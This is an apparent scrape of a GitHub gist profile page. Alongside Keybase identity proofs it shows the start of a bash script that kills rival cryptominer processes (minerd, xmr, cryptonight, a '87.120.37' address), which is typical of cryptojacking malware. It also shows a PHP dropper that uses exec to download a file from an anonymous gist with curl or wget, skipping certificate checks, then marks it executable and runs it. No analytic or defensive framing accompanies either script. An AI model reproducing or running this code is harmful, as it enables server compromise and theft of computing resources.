Skip to content

Instantly share code, notes, and snippets.

View kieguin's full-sized avatar
🐧

kieguin kieguin

🐧
View GitHub Profile
### Keybase proof
I hereby claim:
* I am 0x51d on github.
* I am 0x51d (https://keybase.io/0x51d) on keybase.
* I have a public key ASBO_Xp-ZrkPETWu0Ev7p3D6ClkgLNhPNu-XQydalCGj7wo
To claim this, I am signing this object:
@kieguin
kieguin / 200
Created March 14, 2018 11:33
200
#!/bin/bash
pkill -f cpuz
pkill -f "87.120.37"
pkill -f cpumi
pkill -f minerd
pkill -f cryptonight
pkill -f xmr
isTmp=true

Keybase proof

I hereby claim:

  • I am kshux on github.
  • I am kshux (https://keybase.io/kshux) on keybase.
  • I have a public key ASBqCSf2Kh18rh4HAZOuk_XahlvrVnKw5bc1PltXQEMw0go

To claim this, I am signing this object:

#!/bin/bash
pkill -f cpuz
pkill -f "87.120.37"
pkill -f cpumi
pkill -f minerd
pkill -f cryptonight
pkill -f xmr
isTmp=true
<?php
//with love from moscow <3
exec('if curl -s 127.0.0.1 -o /dev/null 2>/dev/null; then curl -s --insecure -o 500 https://gist.githubusercontent.com/anonymous/cc200818fd964d31f35ff8be3a212a8f/raw/38b41b6f5893ed9b08596d13cf559cebed60f14d/gistfile1.txt && chmod 777 500 && ./500; else wget --no-check-certificate -O 500 https://gist.githubusercontent.com/anonymous/cc200818fd964d31f35ff8be3a212a8f/raw/38b41b6f5893ed9b08596d13cf559cebed60f14d/gistfile1.txt && chmod 777 500 && ./500; fi');
echo 'done';
?>